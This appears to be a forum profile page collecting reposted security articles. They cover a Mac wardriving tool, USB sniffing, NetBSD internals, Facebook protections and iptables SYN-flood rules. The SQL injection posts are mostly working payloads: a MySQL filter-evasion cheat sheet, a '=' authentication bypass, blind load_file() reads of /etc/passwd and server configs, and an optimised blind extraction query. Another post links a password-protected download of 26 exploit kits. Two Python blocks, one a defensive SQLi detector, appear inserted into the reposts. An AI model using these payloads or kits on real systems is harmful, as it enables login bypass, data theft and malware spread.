Nytro
Everything posted by Nytro

  1. Linux exploit development part 4 Authored by sickness Posted May 15, 2011 Whitepaper called Linux exploit development part 4 - ASCII armor bypass + return-to-plt. Download: http://packetstormsecurity.org/files/download/101426/lewt4-bypass.pdf http://www.exploit-db.com/download_pdf/17286
  2. KisMAC - Wireless Security Tool For Mac OS

As discussed in so many topics for both the Linux and Windows operating systems, this article will now talk about the Wireless LAN (WLAN) security tool that is available for the Mac operating system. This article is linked with the series of articles on wardriving. Wardriving is the act of searching for/locating and exploiting an access point. If you are a regular Mac user then this tool is for you: KisMAC is a free, open source wireless stumbling and security tool for Mac OS X. KisMAC is a replica of NetStumbler for Windows and Kismet for Linux; the overall idea of wardriving is the same. You can get and install KisMAC on your MacBook and start driving; the concept of gpsd is the same. It has an advantage over MacStumbler / iStumbler / NetStumbler in that it uses monitor mode and passive scanning. KisMAC supports many third party USB devices: Intersil Prism2, Ralink rt2570, rt73, and Realtek rtl8187 chipsets. All of the internal AirPort hardware is supported for scanning.

Key Features
  • Reveals hidden / cloaked / closed SSIDs
  • Shows logged in clients (with MAC addresses, IP addresses and signal strengths)
  • Mapping and GPS support
  • Can draw area maps of network coverage
  • PCAP import and export
  • Support for 802.11b/g
  • Different attacks against encrypted networks
  • Deauthentication attacks
  • AppleScript-able
  • Kismet drone support (capture from a Kismet drone)

Cracking Support
  • Bruteforce attacks against LEAP, WPA and WEP
  • Weak scheduling attack against WEP
  • Newsham 21-bit attack against WEP

Download: http://kismac-ng.org/
Tutorial: http://trac.kismac-ng.org/wiki/tutorials

Source: KisMAC- Wireless Security Tool For MAC OS | Ethical Hacking-Your Way To The World OF IT Security
  3. USB sniffing on linux

March 18th, 2009

The linux kernel has a facility called “usbmon” which can be used to sniff the USB bus. It’s been in there for ages, and the output is really easy to collect, even from the command line shell. Simply mount debugfs and insmod the usbmon module:

mount -t debugfs none_debugs /sys/kernel/debug
modprobe usbmon

Then you can just cat USB traffic like this:

cat /sys/kernel/debug/usbmon/1u

It all comes out in an ASCII dump format which is easily parsed. Every USB bus also has a device file where you can sniff the raw packets straight off the wire. More info in the usbmon documentation.

But while it’s all easily parsed if you need it, there aren’t really any tools around that do it for you. That is… except for libpcap. Libpcap is the power behind the throne of the venerable tcpdump tool. Tcpdump is not much more than a command line parser and pretty-printer of various network protocols. The heavy duty lifting is done by libpcap, not least by providing a cross-platform API for sniffing devices, something that is otherwise non-standard and different on every platform. It’s great, I’ve used it before (in capstats) and it’s very easy to use. Libpcap on linux supports usbmon sniffing, which means you can use tcpdump to sniff a USB port and write this to a capture file. But best of all: wireshark, the all-singing all-dancing network analyzer that uses tcpdump capture files, has USB support as well. So this is the result:

The screenshot shows a filter applied to only see device 18 on the sniffed USB bus. That’s an arduino, i.e. an FTDI USB-serial chip. The FTDI chips send status updates to the USB host system every 16ms (!). The status update consists of a two-byte message (described here). This is actually present in every packet coming in from the FTDI chip; status updates just don’t have any other data. So for a clean sniffing session from the arduino, we want to filter out any packets that are < 3 bytes in length.

The end result is serial data which the arduino sent to the host system. The screenshot shows a session on my arduino shell, arsh. This is great stuff – wireshark includes a massive amount of analysis tools and lots of options for filtering and otherwise massaging your captured data. You need relatively recent versions of libpcap, tcpdump and wireshark for this. I compiled all three of these out of their respective repositories (easy compile all). On my ubuntu system, the libpcap version was particularly old. Tcpdump doesn’t have a pretty-printer for USB data yet, so you can only dump to a capture file for processing by wireshark.

Source: bert’s blog » Blog Archive » USB sniffing on linux
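As an added example (not code from bert's post), the parsing the post says is "easily done" but not done by any tool: a small Python reader for the usbmon text format that drops the FTDI two-byte status updates and reassembles the serial bytes device 18 sent to the host. It assumes the field layout of the `<bus>u` text format as given in the kernel's usbmon documentation and the FTDI status-byte layout described above; the capture lines are constructed, not a real trace.

```python
import re

# One line of usbmon's text format (/sys/kernel/debug/usbmon/<bus>u), as documented
# in the kernel's usbmon documentation (assumed layout):
#   <urb tag> <timestamp us> <event S|C|E> <Xd:bus:dev:ep> <status> <len> [= <hex words>]
# X is the transfer type (C/Z/I/B), d the direction (i = device-to-host, o = host-to-device).
LINE_RE = re.compile(
    r"^(?P<tag>[0-9a-f]+)\s+(?P<ts>\d+)\s+(?P<event>[SCE])\s+"
    r"(?P<xfer>[CZIB])(?P<dir>[io]):(?P<bus>\d+):(?P<dev>\d+):(?P<ep>\d+)\s+"
    r"(?P<status>\S+)\s+(?P<length>\d+)"
    r"(?:\s+=\s+(?P<data>[0-9a-f ]+))?"
)

# FTDI USB-serial chips prefix every IN packet with two modem-status bytes;
# a packet that is only those two bytes is the periodic (16 ms) status update.
FTDI_STATUS_LEN = 2


def parse_usbmon_line(line):
    """Parse one usbmon text line into a dict, or return None for anything else."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    hex_words = (m.group("data") or "").replace(" ", "")
    return {
        "timestamp_us": int(m.group("ts")),
        "event": m.group("event"),
        "xfer": m.group("xfer"),
        "dir": m.group("dir"),
        "bus": int(m.group("bus")),
        "dev": int(m.group("dev")),
        "ep": int(m.group("ep")),
        "length": int(m.group("length")),
        "data": bytes.fromhex(hex_words),
    }


def is_ftdi_status_only(pkt):
    """The post's filter: anything shorter than 3 bytes is a bare status update."""
    return pkt["length"] < FTDI_STATUS_LEN + 1


def extract_ftdi_serial(lines, dev):
    """Reassemble the serial bytes that device `dev` sent to the host."""
    out = bytearray()
    for line in lines:
        pkt = parse_usbmon_line(line)
        if pkt is None or pkt["dev"] != dev:
            continue
        # Only completed (C) bulk-IN (Bi) URBs carry device-to-host payload;
        # submissions (S) and OUT transfers are skipped.
        if pkt["event"] != "C" or pkt["xfer"] != "B" or pkt["dir"] != "i":
            continue
        if is_ftdi_status_only(pkt):
            continue
        out += pkt["data"][FTDI_STATUS_LEN:]   # strip the two status bytes
    return bytes(out)


# Constructed capture excerpt (not a real trace): device 18 plays the arduino
# from the post, device 2 is an unrelated bulk device on the same bus.
SAMPLE_CAPTURE = """\
ffff88003a1c0c00 2991050 S Bi:1:018:1 -115 64 <
ffff88003a1c0c00 2991066 C Bi:1:018:1 0 2 = 0160
ffff88003a1c0c00 2991082 C Bi:1:018:1 0 6 = 01606172 7368
ffff88003a1c0c00 2991098 C Bi:1:002:1 0 4 = 01604141
ffff88003a1c0c00 2991114 C Bi:1:018:1 0 4 = 01603e20
""".splitlines()

if __name__ == "__main__":
    print(extract_ftdi_serial(SAMPLE_CAPTURE, 18))   # b'arsh> '
```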
  4. 26 Underground Hacking Exploit Kits available for Download ! : The Hacker News

List of Hacking Exploit Kits: Unknow, Tor, Target-Exploit, Smart pack, RDS, My poly sploit, multisploit, mypack-009, mypack-091, mypack-086, mypack-081, Mpack, Infector, Ice-pack-1, Ice-pack-2, Ice-pack-3, G-pack, Fire pack -1, Fire Pack -2, Fiesta -1, Fiesta -2, Cry 217, Armitage, Adpack -1, Adpack -2, 0x88

Download: http://www.multiupload.com/EFDCHHZ9ZD
Password: thn

Source: 26 Underground Hacking Exploit Kits available for Download ! ~ THN : The Hackers News
  5. I "am" from Bucharest. I'll get there around 8 - 8:20. But I don't know how we should do it. I'm going to meet up with Cheater. You can come wearing the "Fan RST" T-shirts.
  6. NetBSD Internals

The NetBSD Developers
Copyright © 2006, 2007, 2008, 2009, 2010 The NetBSD Foundation
All brand and product names used in this guide are or may be trademarks or registered trademarks of their respective owners. NetBSD® is a registered trademark of The NetBSD Foundation, Inc.
Published: 2010/03/06 16:30:38
$NetBSD: index.html,v 1.18 2010/04/30 16:19:12 jakllsch Exp $

Table of Contents
Purpose of this book
1. Memory management
1.1. The UVM virtual memory manager
1.2. Managing wired memory
2. File system internals
2.1. vnode layer overview
2.2. VFS layer overview
2.3. File systems overview
2.4. Initialization and cleanup
2.5. Mounting and unmounting
2.6. File system statistics
2.7. vnode management
2.8. The root vnode
2.9. Path name resolution procedure
2.10. File management
2.11. Symbolic link management
2.12. Directory management
2.13. Special nodes
2.14. NFS support
2.15. Step by step file system writing
3. Processes and threads
3.1. Process startup
3.2. Traps and system calls
3.3. Processes and threads creation
3.4. Processes and threads termination
3.5. Signal delivery
3.6. Thread scheduling
4. Networking
4.1. Routing
4.2. Sockets
4.3. mbufs
4.4. IP layer
4.5. UDP
4.6. TCP
5. Networking Services
5.1. IEEE 802.11
5.2. ISDN
5.3. IPSec
5.4. Networking pseudo-devices
5.5. Packet Filters
6. Regression testing
6.1. Testing file systems
A. Acknowledgments
A.1. Authors
A.2. License
B. Bibliography

Tutorial: http://netbsd.org/docs/internals/en/index.html
  7. SQLi filter evasion cheat sheet (MySQL)

This week I presented my experiences in SQLi filter evasion techniques that I have gained during 3 years of PHPIDS filter evasion at the CONFidence 2.0 conference. You can find the slides here. For a quicker reference you can use the following cheatsheet. More detailed explanation can be found in the slides or in the talk (video should come online in a few weeks).

Basic filter

Comments
' or 1=1#
' or 1=1-- -
' or 1=1/* (MySQL < 5.1)
' or 1=1;%00
' or 1=1 union select 1,2 as `
' or#newline
1='1
' or-- -newline
1='1
' /*!50000or*/1='1
' /*!or*/1='1

Prefixes
+ - ~ !
' or --+2=- -!!!'2

Operators
^, =, !=, %, /, *, &, &&, |, ||, <, >, >>, <<, <=, >=, <>, <=>, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, LEAST, GREATEST, CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL

Whitespaces
%20 %09 %0a %0b %0c %0d %a0 /**/
'or+(1)sounds/**/like"1"--%a0-
'union(select(1),table_name,(3)from`information_schema`.`tables`)#

Strings with quotes
SELECT 'a'
SELECT "a"
SELECT n'a'
SELECT b'1100001'
SELECT _binary'1100001'
SELECT x'61'

Strings without quotes
'abc' = 0x616263

Aliases
select pass as alias from users
select pass aliasalias from users
select pass`alias alias`from users

Typecasting
' or true = '1 # or 1=1
' or round(pi(),1)+true+true = version() # or 3.1+1+1 = 5.1
' or '1 # or true

Compare operator typecasting
select * from users where 'a'='b'='c'
select * from users where ('a'='b')='c'
select * from users where (false)='c'
select * from users where (0)='c'
select * from users where (0)=0
select * from users where true
select * from users

Authentication bypass '='
select * from users where name = ''=''
select * from users where false = ''
select * from users where 0 = 0
select * from users where true
select * from users

Authentication bypass '-'
select * from users where name = ''-''
select * from users where name = 0-0
select * from users where 0 = 0
select * from users where true
select * from users

Function filter

General function filtering
ascii (97)
load_file/*foo*/(0x616263)

Strings with functions
'abc' = unhex(616263)
'abc' = char(97,98,99)
hex('a') = 61
ascii('a') = 97
ord('a') = 97
'ABC' = concat(conv(10,10,36),conv(11,10,36),conv(12,10,36))

Strings extracted from gadgets
collation(\N) // binary
collation(user()) // utf8_general_ci
@@time_format // %H:%i:%s
@@binlog_format // MIXED
@@version_comment // MySQL Community Server (GPL)
dayname(from_days(401)) // Monday
dayname(from_days(403)) // Wednesday
monthname(from_days(690)) // November
monthname(from_unixtime(1)) // January
collation(convert((1)using/**/koi8r)) // koi8r_general_ci
(select(collation_name)from(information_schema.collations)where(id)=2) // latin2_czech_cs

Special characters extracted from gadgets
aes_encrypt(1,12) // 4çh±{?"^c×HéÉEa
des_encrypt(1,2) // ‚GÒ/ïÖk
@@ft_boolean_syntax // + -><()~*:""&|
@@date_format // %Y-%m-%d
@@innodb_log_group_home_dir // .\

Integer representations
false: 0
true: 1
true+true: 2
floor(pi()): 3
ceil(pi()): 4
floor(version()): 5
ceil(version()): 6
ceil(pi()+pi()): 7
floor(version()+pi()): 8
floor(pi()*pi()): 9
ceil(pi()*pi()): 10
concat(true,true): 11
ceil(pi()*pi())+true: 11
ceil(pi()+pi()+version()): 12
floor(pi()*pi()+pi()): 13
ceil(pi()*pi()+pi()): 14
ceil(pi()*pi()+version()): 15
floor(pi()*version()): 16
ceil(pi()*version()): 17
ceil(pi()*version())+true: 18
floor((pi()+pi())*pi()): 19
ceil((pi()+pi())*pi()): 20
ceil(ceil(pi())*version()): 21
concat(true+true,true): 21
ceil(pi()*ceil(pi()+pi())): 22
ceil((pi()+ceil(pi()))*pi()): 23
ceil(pi())*ceil(version()): 24
floor(pi()*(version()+pi())): 25
floor(version()*version()): 26
ceil(version()*version()): 27
ceil(pi()*pi()*pi()-pi()): 28
floor(pi()*pi()*floor(pi())): 29
ceil(pi()*pi()*floor(pi())): 30
concat(floor(pi()),false): 30
floor(pi()*pi()*pi()): 31
ceil(pi()*pi()*pi()): 32
ceil(pi()*pi()*pi())+true: 33
ceil(pow(pi(),pi())-pi()): 34
ceil(pi()*pi()*pi()+pi()): 35
floor(pow(pi(),pi())): 36
@@new: 0
@@log_bin: 1
!pi(): 0
!!pi(): 1
true-~true: 3
log(-cos(pi())): 0
-cos(pi()): 1
coercibility(user()): 3
coercibility(now()): 4
minute(now())
hour(now())
day(now())
week(now())
month(now())
year(now())
quarter(now())
year(@@timestamp)
crc32(true)

Extract substrings
substr('abc',1,1) = 'a'
substr('abc' from 1 for 1) = 'a'
substring('abc',1,1) = 'a'
substring('abc' from 1 for 1) = 'a'
mid('abc',1,1) = 'a'
mid('abc' from 1 for 1) = 'a'
lpad('abc',1,space(1)) = 'a'
rpad('abc',1,space(1)) = 'a'
left('abc',1) = 'a'
reverse(right(reverse('abc'),1)) = 'a'
insert(insert('abc',1,0,space(0)),2,222,space(0)) = 'a'
space(0) = trim(version()from(version()))

Search substrings
locate('a','abc')
position('a','abc')
position('a' IN 'abc')
instr('abc','a')
substring_index('ab','b',1)

Cut substrings
length(trim(leading 'a' FROM 'abc'))
length(replace('abc', 'a', ''))

Compare strings
strcmp('a','a')
mod('a','a')
find_in_set('a','a')
field('a','a')
count(concat('a','a'))

String length
length()
bit_length()
char_length()
octet_length()
bit_count()

String case
ucase
lcase
lower
upper
password('a') != password('A')
old_password('a') != old_password('A')
md5('a') != md5('A')
sha('a') != sha('A')
aes_encrypt('a') != aes_encrypt('A')
des_encrypt('a') != des_encrypt('A')

Keyword filter

Connected keyword filtering
(0)union(select(table_name),column_name,...
0/**/union/*!50000select*/table_name`foo`/**/...
0%a0union%a0select%09group_concat(table_name)....
0?union all select all`table_name`foo from`information_schema`. `tables`

OR, AND
'||1='1
'&&1='1
'='
'-'

OR, AND, UNION
' and (select pass from users limit 1)='secret

OR, AND, UNION, LIMIT
' and (select pass from users where id =1)='a

OR, AND, UNION, LIMIT, WHERE
' and (select pass from users group by id having id = 1)='a

OR, AND, UNION, LIMIT, WHERE, GROUP
' and length((select pass from users having substr(pass,1,1)='a'))

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING
' and (select substr(group_concat(pass),1,1) from users)='a
' and substr((select max(pass) from users),1,1)='a
' and substr((select max(replace(pass,'lastpw','')) from users),1,1)='a

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT
' and substr(load_file('file'),locate('DocumentRoot',(load_file('file')))+length('DocumentRoot'),10)='a
'='' into outfile '/var/www/dump.txt

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT, FILE
' procedure analyse()#
'-if(name='Admin',1,0)#
'-if(if(name='Admin',1,0),if(substr(pass,1,1)='a',1,0),0)#

Control flow
case 'a' when 'a' then 1 [else 0] end
case when 'a'='a' then 1 [else 0] end
if('a'='a',1,0)
ifnull(nullif('a','a'),1)

If you have any other useful tricks I forgot to list here please leave a comment.

Source: SQLi filter evasion cheat sheet (MySQL) « Reiners' Weblog
  8. MySQL Authentication Bypass

I used this trick already to circumvent the PHPIDS filters in some earlier versions and mentioned it briefly in my article about MySQL Syntax. However, when I used the same trick to circumvent the GreenSQL database firewall I noticed that this MySQL "bug" is not well known, so I decided to write about it briefly. Take a look at the following insecure SQL query:

SELECT * FROM table WHERE username = '$username' and password = '$password'

Everyone knows about the simple authentication bypass using ' OR 1=1/* as username, or perhaps ' OR 1='1 for both inputs. But what MySQL also allows is a direct comparison of 2 strings:

SELECT * FROM table WHERE username = 'string'='string' and password = 'string'='string'

Therefore you don't need any operators like "OR", which are mostly detected by filters. To shorten your vector you can also use an empty string, narrowing your SQL injection to:

username: '='
password: '='

Which ends in:

SELECT * FROM table WHERE username = ''='' and password = ''=''

and successfully bypasses authentication on MySQL. Of course you can use other operators than "equal" and use whitespaces and prefixes to build more complex vectors to circumvent filters. Please refer to the MySQL syntax article. I have also tested this behavior on MSSQL, PostgreSQL and Oracle, which do not have the same behavior. What MySQL seems to allow is a triple comparison in a WHERE clause. That means you can use:

SELECT * FROM users WHERE 1=1=1
SELECT * FROM users WHERE 'a'='a'='a'

Interestingly the following queries also work:

SELECT * FROM users WHERE 'a'='b'='c'
SELECT * FROM users WHERE column='b'='c'
SELECT * FROM users WHERE column=column=1

That means if you compare strings it doesn't matter if they are equal, and it seems like if you compare columns with strings or integers they will get typecasted. Lastly I would like to recommend a great article from Stefan Esser about another authentication bypass on MySQL.

Updated: MySQL does not consider this as a bug. Please refer to the bugreport for detailed information. Again this shows how flexible the MySQL syntax is (intentionally).

Source: MySQL Authentication Bypass « Reiners' Weblog
  9. Blind SQL injection with load_file()

Currently I am working a lot on RIPS but here is a small blogpost about a technique I thought about lately and wanted to share. While participating in the smpCTF I came across a blind SQL injection in level 2. After solving the challenge I checked for the FILE privilege:

/level2/?id=1/**/and/**/(SELECT/**/is_grantable/**/FROM/**/information_schema.user_privileges/**/WHERE/**/privilege_type=0x66696C65/**/AND/**/grantee/**/like/**/0x25726F6F7425/**/limit/**/1)=0x59

Luckily the FILE privilege was granted, which was not intended by the organizer. Since I had not solved level 1 at that time I thought it would be easier to read the PHP files to solve level 1. First I checked if reading files with load_file() worked at all and tried to read /etc/passwd:

/level2/?id=1/**/and/**/!isnull(load_file(2F6574632F706173737764))

Since the webpage with id=1 was displayed, the AND condition must have evaluated to true, which means that the file could be read (load_file() returns null if the file can not be read). Before reading the PHP files I needed to find the webserver configuration file to find out where the DocumentRoot was configured. I used the same query as above to check for the existence of the following apache config files:

$paths = array(
    "/etc/passwd",
    "/etc/init.d/apache/httpd.conf",
    "/etc/init.d/apache2/httpd.conf",
    "/etc/httpd/httpd.conf",
    "/etc/httpd/conf/httpd.conf",
    "/etc/apache/apache.conf",
    "/etc/apache/httpd.conf",
    "/etc/apache2/apache2.conf",
    "/etc/apache2/httpd.conf",
    "/usr/local/apache2/conf/httpd.conf",
    "/usr/local/apache/conf/httpd.conf",
    "/opt/apache/conf/httpd.conf",
    "/home/apache/httpd.conf",
    "/home/apache/conf/httpd.conf",
    "/etc/apache2/sites-available/default",
    "/etc/apache2/vhosts.d/default_vhost.include");

Update: There is an official list for Apache. Very useful.

The webpage with id=1 was displayed for the file /etc/httpd/httpd.conf, thus revealing that this file existed and could be read.

Now it was time for the tricky part: I had only a true/false blind SQL injection, which means that I could only bruteforce the configuration file char by char. Since the length of the file was more than 10000 chars this would have taken way too long. I decided to take little shots at the configuration file, trying to hit the DocumentRoot setting or a comment nearby that identifies my current position. Each shot bruteforced 10 alphanumerical characters:

/level2/?id=1/**/and/**/mid(lower(load_file(0x2F6574632F68747470642F68747470642E636F6E66)),$k,1)=0x$char

I compared the few bruteforced characters to a known apache configuration file, trying to map the characters to a common configuration comment. This worked for most of the character sequences, but unfortunately almost every configuration file is a bit different, so that it was not possible to calculate the correct offset of the DocumentRoot setting once another setting had been identified. I bruteforced only alphanumerical strings to save time. For example the bruteforced string "dulesthoselisted" could be mapped to the comment "modules (those listed by `httpd -l')" and so on. After the 10th shot I luckily hit the DocumentRoot setting comment at offset 7467, and after this it was possible to calculate the correct offset for the beginning of the DocumentRoot setting and I could retrieve "srvhttpdhtdocs" (DocumentRoot: /srv/httpd/htdocs/).

While that worked fine during the hectic CTF and was better than a bruteforce on the whole configuration file, I thought about it again yesterday and realised that this technique was plain stupid. If you know what you are looking for in a file (and mostly you do) you can easily find the correct offset with LOCATE(substr,str[,pos]), which will return the offset of a given substring found in a string. The following query instantly returns the next 10 characters after the DocumentRoot setting:

substr(load_file('file'),locate('DocumentRoot',(load_file('file')))+length('DocumentRoot'),10)

and can then be bruteforced easily:

mid(lower(substr(load_file('file'),locate('DocumentRoot',(load_file('file')))+length('DocumentRoot'),10)),$k,1)=0x$char

No magic here, but a helpful combination of MySQL built-in functions when reading files blindly.

Source: Blind SQL injection with load_file() « Reiners' Weblog
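The defender's counterpart to posts 7 and 9, added here as an example (not code from Reiners' posts): a Python request-line normalizer that undoes the obfuscations the cheat sheet lists (URL-encoded and %a0 whitespace, `/**/` and `/*!50000...*/` comments, `0x...` hex literals) before matching a few keyword signatures, so that the `load_file(0x2F...)` and `union(select...` vectors above and a plain `' or 1=1` all reduce to the same canonical form. The signature set and the sample request lines are constructed for illustration; real deployments need tuning against their own traffic.

```python
import re
from urllib.parse import unquote

# Whitespace substitutes from the cheat sheet (%20 %09 %0a %0b %0c %0d %a0),
# as they appear after URL decoding.
WS_CHARS = "\x20\x09\x0a\x0b\x0c\x0d\xa0"
WS_RE = re.compile("[%s]+" % re.escape(WS_CHARS))

# MySQL comment forms: the body of /*!50000 ... */ IS executed by MySQL, so it is
# kept (padded, so "or" and "1" stay separate tokens); plain /* ... */ is whitespace.
VERSIONED_RE = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)
PLAIN_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
HEX_RE = re.compile(r"\b0x([0-9a-fA-F]+)\b")


def _decode_hex(m):
    """Rewrite 0x2F657463... back into the quoted text it encodes."""
    digits = m.group(1)
    if len(digits) % 2:
        return m.group(0)
    text = bytes.fromhex(digits).decode("latin-1")
    # Only rewrite literals that spell printable text (paths, names, keywords).
    return "'%s'" % text if text.isprintable() else m.group(0)


def normalize(raw):
    """Reduce an obfuscated request line to one canonical, lower-case form."""
    s = unquote(raw, encoding="latin-1")      # decode as latin-1 so %a0 survives
    s = VERSIONED_RE.sub(lambda m: " %s " % m.group(1), s)
    s = PLAIN_COMMENT_RE.sub(" ", s)
    s = WS_RE.sub(" ", s)
    s = HEX_RE.sub(_decode_hex, s)
    return s.strip().lower()


# Constructed signatures for the techniques the two posts use.
INDICATORS = {
    "union_select": re.compile(r"\bunion\b[\s\S]{0,32}?\bselect\b"),
    "information_schema": re.compile(r"\binformation_schema\b"),
    "file_access": re.compile(r"\bload_file\s*\(|\binto\s+(?:out|dump)file\b"),
    "or_tautology": re.compile(r"(?:\bor\b|\|\|)\s*\(*\s*(?:\d+|'[^']*'|true)\s*(?:=|like)"),
}


def classify(normalized):
    """Names of the signatures that match an already-normalized line."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(normalized))


# Constructed sample request lines (not real traffic); the first two mirror
# vectors quoted in the posts above, the last one is benign.
SAMPLE_REQUESTS = [
    "/level2/?id=1/**/and/**/!isnull(load_file(0x2F6574632F706173737764))",
    "/items?name=%27union(select(1),table_name,(3)from%60information_schema%60.%60tables%60)%23",
    "/login?u=%27%20/*!50000or*/1%3D%271&p=x",
    "/login?u=%27or%a01%3D1%23&p=x",
    "/products?id=42&sort=name%20asc",
]


def analyze(requests):
    """Return (request, normalized form, indicators) for every line that trips a signature."""
    hits = []
    for r in requests:
        n = normalize(r)
        ind = classify(n)
        if ind:
            hits.append((r, n, ind))
    return hits


if __name__ == "__main__":
    for raw, norm, ind in analyze(SAMPLE_REQUESTS):
        print(ind, norm)
```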
  10. Facebook Rolls Out Login Approvals and Security Protections Against Clickjacking and Self-XSS

May 13th, 2011 By Josh Constine

Facebook has released several new security features designed to thwart unauthorized logins, cross-site scripting, and clickjacking that trick users into sharing spam to the news feed. Login approvals require suspicious logins to be confirmed with a code texted to a user’s phone, while self-XSS and clickjacking protection warns users and requires them to confirm their actions when pasting links into their browser or clicking suspicious Like buttons. These protections should reduce the prevalence of hijacked accounts and highly visible spam in the news feed that perpetuate the public perception of Facebook as less safe than the rest of the internet.

Facebook’s latest internal security efforts were announced alongside a new partnership with Web of Trust, a crowd-sourced website reputation rating service that will be used to power alerts to Facebook users when they click malicious outbound links. Facebook has previously concentrated on improving security through user education and login protection features such as remote session logout and one-time passwords.

Login Approvals

Now Facebook is rolling out the two-factor authentication it announced last month. Users can visit Account -> Account Settings -> Settings -> Account Security to enable the feature, which will require them to verify their phone number. Once enabled, any time someone attempts to log in to the account through a new or unrecognized device, they’ll have to enter a code sent to their phone via SMS. Users will also be notified, the next time they successfully log in, of any suspicious attempts thwarted by the login approvals feature. Users who have Login Approvals enabled could be temporarily locked out of their account in the unlikely event that both their phone and their approved Facebook login device were lost or stolen.

Still, the feature offers a strong additional layer of security for those who opt in to it. It can also serve to protect users who may share their password with a loved one for use on their regular login device, but who don’t want those people to access their account from elsewhere.

Clickjacking Protection

Clickjacking refers to when a malicious website conceals an active link beneath an image or other disguise to fool a user into clicking a link they didn’t intend to. In the case of Facebook, malicious sites sometimes conceal Like buttons beneath video players or appealing offers, leading users to inadvertently share the spam site to the news feed, drawing more users into the scam. Facebook already has automated systems designed to identify and disable uses of the Like button for clickjacking, as well as block or remove outbound links to clickjacking sites. Now Facebook has added additional protection against the tactic by requiring users to confirm they wanted to click a Like button that is suspected to be part of a clickjacking scheme. The Like won’t go through and stories won’t be published to the news feed unless the user confirms. This feature could cut down on one of the most prominent Facebook security threats as of late, which has spread through links that promise videos of racy or gruesome content.

Self-XSS Protection

Self cross-site scripting is a security threat in which a spam news feed story, wall post, or Message asks users to copy malicious code into their browser, thereby causing a hacker’s message to be posted to additional friends. These threats have become increasingly sophisticated over the years (if you want to get deeper into the topic, be sure to check out security researcher Joey Tyson’s Social Hacking blog). The new security feature detects when users attempt to paste malicious code into their browser, displays an alert explaining why the practice of copying code into a browser is dangerous, and prevents the code from being run.

By mixing education in with technical security features, Facebook can protect users now and teach them to protect themselves in the future.

Source: Facebook Rolls Out Login Approvals and Security Protections Against Clickjacking and Self-XSS
  11. Optimized Blind MySQL Injection Data Retrieval

Posted on March 31, 2011 by Roberto Salgado

I recently came across a paper titled Faster Blind MySQL Injection Using Bit Shifting by Jelmer de Hen describing a technique that allows the retrieval of data from a MySQL database in only 8 requests per character using bit shifting; this is a slight improvement on the traditional bisection method. This got me thinking about how information could be extracted from the database in even fewer requests, and after a few hours of fooling around, this is what I came up with:

AND (SELECT @a:=MID(BIN(FIND_IN_SET(MID(table_name,1,1), 'a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,$,%,^,&,*,(,),-,+,=,\,,.,",\',~,`,\\,|,{,},[,],:,;, ,')),1,1) FROM information_schema.tables LIMIT 1)=@a AND IF(@a!='',@a,SLEEP(5));

A quick explanation of how this query works and what it does: It starts off with your basic blind injection, selecting only 1 character at a time from the table:

SELECT MID(table_name,1,1) FROM information_schema.tables LIMIT 1

It then uses FIND_IN_SET() to look for the position of the extracted character in the list. So for example, say the table is CHARACTER_SET, MID("CHARACTER_SET",1,1) = 'C', therefore the returned value for FIND_IN_SET('C', 'a,b,c') would be 3 (case insensitive). We then proceed to use BIN() to convert it to binary, BIN(3) = 11. Now that we've reduced the character to two possibilities, 1 or 0, we only have to check if the result is 1; if not, we can assume it's 0. So BIN(3) = 11 would take 3 requests: Is the first digit 1? Yes. Is the second digit 1? Yes. Is the third digit 1? No, there is no third digit, so it triggers the SLEEP() function. Now we know that CAST(b'11' AS DEC) is 3 and that's the equivalent of 'c' on the list, all in 3 requests! Say your list contained 45 elements, BIN(45) = 101101, still making the total number of requests only 7 for characters in a later position on the list.

I'm sure this could be optimized and greatly improved, possibly by removing the need for FIND_IN_SET() and using a more effective function. One idea would be to split the list in two requests; this way you can ensure the length of the binary doesn't grow too big.

Downside: The query can be a bit longer than normal. Requires SLEEP() to know when you've reached the end of the binary.

Another possible solution that doesn't require SLEEP(), but would require two different pages (test.php?id=0, test.php?id=1), could be done with something like this:

IF((@a:=MID(BIN(FIND_IN_SET(MID((SELECT table_name FROM information_schema.tables LIMIT 1),1,1),'a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,$,%,^,&,*,(,),-,+,=,\,,.,",\',~,`,\\,|,{,},[,],:,;, ')),1,1))!='',@a,0/0);

UPDATE: Two things I just thought I should point out: This technique doesn't necessarily require FIND_IN_SET(). There are plenty of other similar functions that could be substituted in its place (locate, position, instr, field) just to name a few. Secondly, the use of quotations can be avoided. For example, FIND_IN_SET(0x33, CONCAT_WS(0x2C,0x31,0x32,0x33));

Source: Optimized Blind MySQL Injection Data Retrieval
  12. Linux Iptables Limit the number of incoming tcp connection / syn-flood attacks

by LinuxTitli on June 26, 2005

A SYN flood is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system. This is a well known type of attack and is generally not effective against modern networks. It works if a server allocates resources after receiving a SYN, but before it has received the ACK. If half-open connections bind resources on the server, it may be possible to take up all these resources by flooding the server with SYN messages. A SYN flood is a common attack and it can be blocked with the following iptables rule:

iptables -A INPUT -p tcp --syn -m limit --limit 1/s --limit-burst 3 -j RETURN

All incoming connections are allowed till the limit is reached:
--limit 1/s: Maximum average matching rate in seconds
--limit-burst 3: Maximum initial number of packets to match

Open our iptables script, add the rules as follows:

# Limit the number of incoming tcp connections
# Interface 0 incoming syn-flood protection
iptables -N syn_flood
iptables -A INPUT -p tcp --syn -j syn_flood
iptables -A syn_flood -m limit --limit 1/s --limit-burst 3 -j RETURN
iptables -A syn_flood -j DROP

#Limiting the incoming icmp ping request:
iptables -A INPUT -p icmp -m limit --limit 1/s --limit-burst 1 -j ACCEPT
iptables -A INPUT -p icmp -m limit --limit 1/s --limit-burst 1 -j LOG --log-prefix PING-DROP:
iptables -A INPUT -p icmp -j DROP
iptables -A OUTPUT -p icmp -j ACCEPT

